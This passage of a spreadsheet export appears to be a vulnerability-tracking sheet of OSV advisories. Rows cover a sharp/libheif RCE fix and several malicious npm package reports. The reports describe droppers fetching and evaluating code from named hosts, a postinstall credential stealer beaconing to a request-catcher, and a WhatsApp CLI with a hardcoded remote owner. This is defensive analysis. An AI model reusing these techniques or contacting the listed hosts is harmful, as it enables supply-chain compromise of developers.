Heap-based buffer overflow in Visual Studio allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T99" s="6" t="inlineStr"><is><t>https://osv.dev/vulnerability/GHSA-q72m-f2r4-w4cw</t></is></c></row><row r="100"><c r="A100" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B100" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C100" s="5" t="inlineStr"><is><t>GHSA-rgj7-g3m4-5g8c</t></is></c><c r="D100" s="5" t="inlineStr" /><c r="E100" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F100" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G100" s="5" t="inlineStr" /><c r="H100" s="5" t="inlineStr" /><c r="I100" s="5" t="inlineStr" /><c r="J100" s="5" t="inlineStr" /><c r="K100" s="5" t="inlineStr" /><c r="L100" s="5" t="inlineStr"><is><t>npm:sharp</t></is></c><c r="M100" s="5" t="inlineStr"><is><t>0.35.4</t></is></c><c r="N100" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O100" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P100" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q100" s="5" t="inlineStr" /><c r="R100" s="5" t="inlineStr" /><c r="S100" s="5" t="inlineStr"><is><t>### Impact
A number of vulnerabilities, two rated as "Critical" severity using CVSSv3, have been discovered and fixed in the upstream libheif dependency. These can lead to possible remote code execution (RCE) on glibc-based Linux when run under certain conditions.

The attack vector for these claims to be "network" however sharp does not provide any networking features so this vulnerability is down-rated to a "High" severity using CVSSv4 but please note its Subsequent System Impact.

Those processing untrusted input with versions of sharp prior to 0.35.4 are affected.

### Patches

#### Using prebuilt binaries provided by sharp?

Most people rely on the prebuilt binaries provided by sharp.

Please upgrade sharp to the latest version, currently 0.35.4, which provides libheif 1.23.2.

#### Using a globally-installed libheif?

Please ensure you are using the latest libheif 1.23.2.

### Workarounds
Add the following to your code to prevent sharp from decoding AVIF images.
```js
sharp.block({ operation: ["VipsForeignLoadHeif"] });
```

Ensure you are using a `node` executable binary compiled as a Position Independent Executable (PIE). Most Linux package managers already do this for protection against RCE however be warned that the "official" Node.js binaries do not.

### References
- [CVE-2026-84383](https://github.com/strukturag/libheif/security/advisories/GHSA-g89c-p67h-r497)
- https://github.com/strukturag/libheif/security/advisories/GHSA-2jg2-4ch7-h545</t></is></c><c r="T100" s="6" t="inlineStr"><is><t>https://osv.dev/vulnerability/GHSA-rgj7-g3m4-5g8c</t></is></c></row><row r="101"><c r="A101" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B101" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C101" s="5" t="inlineStr"><is><t>GHSA-v3f6-m9j2-437p</t></is></c><c r="D101" s="5" t="inlineStr" /><c r="E101" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F101" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G101" s="5" t="inlineStr" /><c r="H101" s="5" t="inlineStr" /><c r="I101" s="5" t="inlineStr" /><c r="J101" s="5" t="inlineStr" /><c r="K101" s="5" t="inlineStr" /><c r="L101" s="5" t="inlineStr"><is><t>NuGet:Microsoft.AspNetCore.Server.IISIntegration</t></is></c><c r="M101" s="5" t="inlineStr"><is><t>10.0.12, 11.0.0-rc.1, 8.0.31, 9.0.20</t></is></c><c r="N101" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O101" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P101" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q101" s="5" t="inlineStr" /><c r="R101" s="5" t="inlineStr" /><c r="S101" s="5" t="inlineStr"><is><t>### Duplicate Advisory
This advisory has been withdrawn because it is a duplicate of GHSA-8cp2-47hg-mfgh. This link is maintained to preserve external references.

### Original Description
Improper handling of highly compressed data (data amplification) in ASP.NET Core allows an unauthorized attacker to deny service over a network.</t></is></c><c r="T101" s="6" t="inlineStr"><is><t>https://osv.dev/vulnerability/GHSA-v3f6-m9j2-437p</t></is></c></row><row r="102"><c r="A102" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B102" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C102" s="5" t="inlineStr"><is><t>MAL-2026-16048</t></is></c><c r="D102" s="5" t="inlineStr" /><c r="E102" s="5" t="inlineStr" /><c r="F102" s="5" t="inlineStr" /><c r="G102" s="5" t="inlineStr" /><c r="H102" s="5" t="inlineStr" /><c r="I102" s="5" t="inlineStr" /><c r="J102" s="5" t="inlineStr" /><c r="K102" s="5" t="inlineStr" /><c r="L102" s="5" t="inlineStr"><is><t>npm:punypump</t></is></c><c r="M102" s="5" t="inlineStr" /><c r="N102" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O102" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P102" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q102" s="5" t="inlineStr" /><c r="R102" s="5" t="inlineStr" /><c r="S102" s="5" t="inlineStr"><is><t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (6e56cc14096d20f679823bf15af9f44dff039e01f23d2082eba8020200d04a7f)
The package presents itself as a console shim (index.js is a verbatim copy of console-browserify with description 'Emulate console for all the browsers'), but also ships library.js and test/sessionCtrl.js which auto-execute a stager on module load via initializeService().catch(...). The stager fetches an opaque blob from a base64-hidden URL (config.API_GATEWAY = 'aHR0cHM6Ly93d3cuanNvbmtlZXBlci5jb20vYi9WNk5CWA==' decoding to https://www.jsonkeeper.com/b/V6NBX), AES-256-CBC decrypts it with a hardcoded key, and passes the plaintext to eval(). The endpoint URL, HTTP header name, and header value are all base64-encoded in config.js. Content served from the jsonkeeper.com paste is mutable and attacker-controlled, so require('punypump/library') runs arbitrary attacker code on the installer's machine.
</t></is></c><c r="T102" s="6" t="inlineStr"><is><t>https://osv.dev/vulnerability/MAL-2026-16048</t></is></c></row><row r="103"><c r="A103" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B103" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C103" s="5" t="inlineStr"><is><t>MAL-2026-16049</t></is></c><c r="D103" s="5" t="inlineStr" /><c r="E103" s="5" t="inlineStr" /><c r="F103" s="5" t="inlineStr" /><c r="G103" s="5" t="inlineStr" /><c r="H103" s="5" t="inlineStr" /><c r="I103" s="5" t="inlineStr" /><c r="J103" s="5" t="inlineStr" /><c r="K103" s="5" t="inlineStr" /><c r="L103" s="5" t="inlineStr"><is><t>npm:tailwindcss-aspectratio-styles</t></is></c><c r="M103" s="5" t="inlineStr" /><c r="N103" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O103" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P103" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q103" s="5" t="inlineStr" /><c r="R103" s="5" t="inlineStr" /><c r="S103" s="5" t="inlineStr"><is><t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (9b995eb02f80f9037beda9f8a864f55109e054925175289df0c1b29ed8011bc3)
src/index.js, referenced by the package main and executed on require(), performs an HTTP GET to http://tailwindlan.online, writes the response body to a sibling file, and immediately require()s that file, giving the operator of tailwindlan.online arbitrary code execution in the installer's Node.js process at import time. The fetch uses plain HTTP with no integrity or signature check, and the domain is unrelated to the tailwindlabs project. The package name resembles the official @tailwindcss/aspect-ratio plugin, and package.json's repository field points at tailwindlabs/tailwindcss-aspect-ratio to mimic the upstream; the legitimate plugin code is preserved verbatim with the remote-fetch-and-execute block appended to the end of the single minified line.
</t></is></c><c r="T103" s="6" t="inlineStr"><is><t>https://osv.dev/vulnerability/MAL-2026-16049</t></is></c></row><row r="104"><c r="A104" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B104" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C104" s="5" t="inlineStr"><is><t>MAL-2026-16050</t></is></c><c r="D104" s="5" t="inlineStr" /><c r="E104" s="5" t="inlineStr" /><c r="F104" s="5" t="inlineStr" /><c r="G104" s="5" t="inlineStr" /><c r="H104" s="5" t="inlineStr" /><c r="I104" s="5" t="inlineStr" /><c r="J104" s="5" t="inlineStr" /><c r="K104" s="5" t="inlineStr" /><c r="L104" s="5" t="inlineStr"><is><t>npm:@aspect-adv-ui/consent-manager</t></is></c><c r="M104" s="5" t="inlineStr" /><c r="N104" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O104" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P104" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q104" s="5" t="inlineStr" /><c r="R104" s="5" t="inlineStr" /><c r="S104" s="5" t="inlineStr"><is><t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (b30b507d6c71f746b0af2d19cbbb85357f15189e7e93118c75b4cb215adc0ece)
@aspect-adv-ui/consent-manager 2.4.1 declares a postinstall hook (`node setup.js`) that fires automatically on every `npm install`. setup.js issues an HTTPS GET to a hardcoded webhook.site inspection endpoint (https://webhook.site/kapper), sending install-event metadata (source IP, TLS/user-agent fingerprint) to an author-controlled third-party collector. The package is advertised as a small GDPR/CCPA consent-bar React component with no native build, no binary, and no legitimate install-time work; the postinstall exists solely to run this beacon. webhook.site is a public request-inspection service commonly used as an anonymous exfiltration/beacon endpoint, and the beacon is not disclosed or opt-in.
</t></is></c><c r="T104" s="6" t="inlineStr"><is><t>https://osv.dev/vulnerability/MAL-2026-16050</t></is></c></row><row r="105"><c r="A105" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B105" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C105" s="5" t="inlineStr"><is><t>MAL-2026-16051</t></is></c><c r="D105" s="5" t="inlineStr" /><c r="E105" s="5" t="inlineStr" /><c r="F105" s="5" t="inlineStr" /><c r="G105" s="5" t="inlineStr" /><c r="H105" s="5" t="inlineStr" /><c r="I105" s="5" t="inlineStr" /><c r="J105" s="5" t="inlineStr" /><c r="K105" s="5" t="inlineStr" /><c r="L105" s="5" t="inlineStr"><is><t>npm:@umschool/analytics</t></is></c><c r="M105" s="5" t="inlineStr" /><c r="N105" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O105" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P105" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q105" s="5" t="inlineStr" /><c r="R105" s="5" t="inlineStr" /><c r="S105" s="5" t="inlineStr"><is><t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (da14c2843514d3c9103335648bc81a8bce18fc173b27c2ab39ebe2c6c0abe028)
@umschool/analytics@999.0.4 targets the internal @umschool npm scope with an implausibly high version number to force resolution over any private package of the same name. Its postinstall.js runs on npm install and collects host identity (os.hostname, os.userInfo, process.cwd), reads /etc/hostname, /etc/hosts, /etc/resolv.conf, and /proc/version, filters process.env for credential-shaped keys matching a broad regex (token/secret/key/pass/aws/db/jwt/auth/etc.), and walks parent directories to read.env and config.* files. Each payload is base64-encoded and transmitted via three HTTPS GET beacons to akko.requestcatcher.com, with an additional hex-encoded DNS beacon of hostname+user to the same domain. A README/comment self-labeling the code as a 'HARMLESS PoC' does not change the observed behavior: credential-shaped environment variables, dotenv files, and internal network configuration leave the installer's build host to a third-party request-catcher.
</t></is></c><c r="T105" s="6" t="inlineStr"><is><t>https://osv.dev/vulnerability/MAL-2026-16051</t></is></c></row><row r="106"><c r="A106" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B106" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C106" s="5" t="inlineStr"><is><t>MAL-2026-16052</t></is></c><c r="D106" s="5" t="inlineStr" /><c r="E106" s="5" t="inlineStr" /><c r="F106" s="5" t="inlineStr" /><c r="G106" s="5" t="inlineStr" /><c r="H106" s="5" t="inlineStr" /><c r="I106" s="5" t="inlineStr" /><c r="J106" s="5" t="inlineStr" /><c r="K106" s="5" t="inlineStr" /><c r="L106" s="5" t="inlineStr"><is><t>npm:open-item-validator</t></is></c><c r="M106" s="5" t="inlineStr" /><c r="N106" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O106" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P106" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q106" s="5" t="inlineStr" /><c r="R106" s="5" t="inlineStr" /><c r="S106" s="5" t="inlineStr"><is><t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (7ba5b55d57f4938bf2494d369d14434bb80ba6f6c712c7f8d89ae773c27dc457)
On require(), index.js spawns a detached, unref'd background Node process (lib/check-items.js) that repeatedly HTTP-GETs a JSON payload from http://itemx.servegame.com:8888/api/x-realtime and executes the returned JavaScript via new Function('require','module', payload.code)(require, moduleObj). The daemon survives the parent process and re-polls the endpoint on a configured interval, so whoever controls that endpoint runs arbitrary Node code on the installer's host on library load and continuously thereafter. The fetch is over plain HTTP to a No-IP dynamic-DNS host (servegame.com) that does not match the publisher's declared homepage (game.spawnrealm.com); a bundled RSA signature check does not alter that the endpoint operator chooses what code runs. README framing as 'signed game code updates' is inconsistent with the shipped generic fetch-and-exec mechanism and the publisher/destination host mismatch.
</t></is></c><c r="T106" s="6" t="inlineStr"><is><t>https://osv.dev/vulnerability/MAL-2026-16052</t></is></c></row><row r="107"><c r="A107" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B107" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C107" s="5" t="inlineStr"><is><t>MAL-2026-16056</t></is></c><c r="D107" s="5" t="inlineStr" /><c r="E107" s="5" t="inlineStr" /><c r="F107" s="5" t="inlineStr" /><c r="G107" s="5" t="inlineStr" /><c r="H107" s="5" t="inlineStr" /><c r="I107" s="5" t="inlineStr" /><c r="J107" s="5" t="inlineStr" /><c r="K107" s="5" t="inlineStr" /><c r="L107" s="5" t="inlineStr"><is><t>npm:tailwind-aspect-styles</t></is></c><c r="M107" s="5" t="inlineStr" /><c r="N107" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O107" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P107" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q107" s="5" t="inlineStr" /><c r="R107" s="5" t="inlineStr" /><c r="S107" s="5" t="inlineStr"><is><t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (4d63fe1e50dc7d704732a5e92e95f320fcc3fac45c5a0a223ed278f316c2bb14)
The package's main module (src/index.js) performs an https.get to http://23.27.245.100/index.js over plain HTTP, writes the response to./inout.js in the consumer's working directory, and immediately require()s the written file. The fetch is unpinned, unauthenticated, and served from a bare IP over cleartext, so the operator of that endpoint controls arbitrary JavaScript executed in the Node process that loads this package. The package presents itself as the Tailwind aspect-ratio plugin, with a package.json repository field pointing to tailwindlabs/tailwindcss-aspect-ratio, while the dropper is appended after the legitimate-looking plugin export.
</t></is></c><c r="T107" s="6" t="inlineStr"><is><t>https://osv.dev/vulnerability/MAL-2026-16056</t></is></c></row><row r="108"><c r="A108" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B108" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C108" s="5" t="inlineStr"><is><t>MAL-2026-16057</t></is></c><c r="D108" s="5" t="inlineStr" /><c r="E108" s="5" t="inlineStr" /><c r="F108" s="5" t="inlineStr" /><c r="G108" s="5" t="inlineStr" /><c r="H108" s="5" t="inlineStr" /><c r="I108" s="5" t="inlineStr" /><c r="J108" s="5" t="inlineStr" /><c r="K108" s="5" t="inlineStr" /><c r="L108" s="5" t="inlineStr"><is><t>npm:toru-ultimate</t></is></c><c r="M108" s="5" t="inlineStr" /><c r="N108" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O108" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P108" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q108" s="5" t="inlineStr" /><c r="R108" s="5" t="inlineStr" /><c r="S108" s="5" t="inlineStr"><is><t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (e6ef8cb6f3ca866b67fa91f2e770c674ddb7d6b110fd671ba98669dc1220510f)
The package's loginViaAPI() function POSTs caller-supplied Facebook email, password, and 2FA Base32 secret to https://minhdong.site/api/v1/facebook/login_ios (a domain unrelated to Facebook, tied to the package's contributor). The response returns Facebook cookies/access_token which are then installed into the caller's session. The README documents login via appState cookies and does not disclose that email/password logins are proxied through minhdong.site. Additionally, package.json declares 'fca-unofficial' as 'github:VangBanLaNhat/fca-unofficial' — an unpinned mutable GitHub reference with no commit SHA. npm install fetches whatever bytes the branch HEAD returns, with no integrity check, and this module is require'd by the bundled E2EE client, so its code runs at import. Whoever controls that GitHub branch controls code delivered to every installer.
</t></is></c><c r="T108" s="6" t="inlineStr"><is><t>https://osv.dev/vulnerability/MAL-2026-16057</t></is></c></row><row r="109"><c r="A109" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B109" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C109" s="5" t="inlineStr"><is><t>MAL-2026-16058</t></is></c><c r="D109" s="5" t="inlineStr" /><c r="E109" s="5" t="inlineStr" /><c r="F109" s="5" t="inlineStr" /><c r="G109" s="5" t="inlineStr" /><c r="H109" s="5" t="inlineStr" /><c r="I109" s="5" t="inlineStr" /><c r="J109" s="5" t="inlineStr" /><c r="K109" s="5" t="inlineStr" /><c r="L109" s="5" t="inlineStr"><is><t>npm:vinzz-wcli</t></is></c><c r="M109" s="5" t="inlineStr" /><c r="N109" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O109" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P109" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q109" s="5" t="inlineStr" /><c r="R109" s="5" t="inlineStr" /><c r="S109" s="5" t="inlineStr"><is><t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (8dec0212466f7170f1e00ecbfe3f846cbf5d211917c3831a6ee162ca6d44ec10)
vinzz-wcli is a WhatsApp CLI whose main entry (index.js) sets `global.ownerr = "6285185667890@s.whatsapp.net"` and treats any incoming WhatsApp message from that JID as coming from an authorized owner. The `messages.upsert` handler routes messages from owners into `handleCommand`, which dispatches to plugins including `cmd` (which calls `child_process.exec` on the message text) and `eval` (which builds and runs an `AsyncFunction` from the message text). When an installer runs the CLI and pairs their own WhatsApp account, the hardcoded third-party number is silently added as an owner and can send arbitrary shell commands and JavaScript to be executed on the installer's host with the installer's privileges. The tarball also ships a second file, index2.js, which is not the declared main but contains the same hardcoded owner JID and the same messages.upsert -&gt; handleCommand dispatch, providing an equivalent execution path if that file is invoked directly.
</t></is></c><c r="T109" s="6" t="inlineStr"><is><t>https://osv.dev/vulnerability/MAL-2026-16058</t></is></c></row><row r="110"><c r="A110" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B110" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C110" s="5" t="inlineStr"><is><t>MAL-2026-16199</t></is></c><c r="D110" s="5" t="inlineStr" /><c r="E110" s="5" t="inlineStr" /><c r="F110" s="5" t="inlineStr" /><c r="G110" s="5" t="inlineStr" /><c r="H110" s="5" t="inlineStr" /><c r="I110" s="5" t="inlineStr" /><c r="J110" s="5" t="inlineStr" /><c r="K110" s="5" t="inlineStr" /><c r="L110" s="5" t="inlineStr"><is><t>npm:plogme</t></is></c><c r="M110" s="5" t="inlineStr" /><c r="N110" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O110" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P110" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q110" s="5" t="inlineStr" /><c r="R110" s="5" t="inlineStr" /><c r="S110" s="5" t="inlineStr"><is><t>plogme is a renamed fork of the Baileys WhatsApp Web library from the same publisher-controlled family as @crysnovax/baileys (MAL-2026-15917), and versions 1.0.0 through 1.0.3 carry the same forced-follow and fingerprint modules. lib/Utils/channel-policy.js (javascript-obfuscator output, identical to the file in MAL-2026-15917) hardcodes the publisher's WhatsApp newsletter channels 120363423670814885@newsletter and 120363402922206865@newsletter and exports followCrysnovaxTrustedChannels(); lib/Socket/socket.js invokes it from the connection.update handler, so the user's own authenticated WhatsApp account silently follows both channels on every successful connection, with no opt-out. lib/Utils/integrity.js hashes hostname, platform, arch, cpu model and Node version into a machine fingerprint and POSTs it with the package identity to https://bailey.crysnovax.link/api/v1/verify on every socket connect. The obfuscated follow module was decoded, not executed.</t></is></c><c r="T110" s="6" t="inlineStr"><is><t>https://osv.dev/vulnerability/MAL-2026-16199</t></is></c></row></sheetData><autoFilter ref="A1:T110" /><conditionalFormatting sqref="E2:E110"><cfRule type="cellIs" priority="1" operator="equal" dxfId="0"><formula>"CRITICAL"</formula></cfRule><cfRule type="cellIs" priority="2" operator="equal" dxfId="1"><formula>"HIGH"</formula></cfRule><cfRule type="cellIs" priority="3" operator="equal" dxfId="2"><formula>"MEDIUM"</formula></cfRule><cfRule type="cellIs" priority="4" operator="equal" dxfId="3"><formula>"LOW"</formula></cfRule></conditionalFormatting><conditionalFormatting sqref="G2:G110"><cfRule type="cellIs" priority="5" operator="equal" dxfId="4"><formula>"Yes"</formula></cfRule></conditionalFormatting><hyperlinks><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s><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2026-09-18T11:14:44Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-09-18T11:14:49Z</dcterms:modified>
</cp:coreProperties>
</file>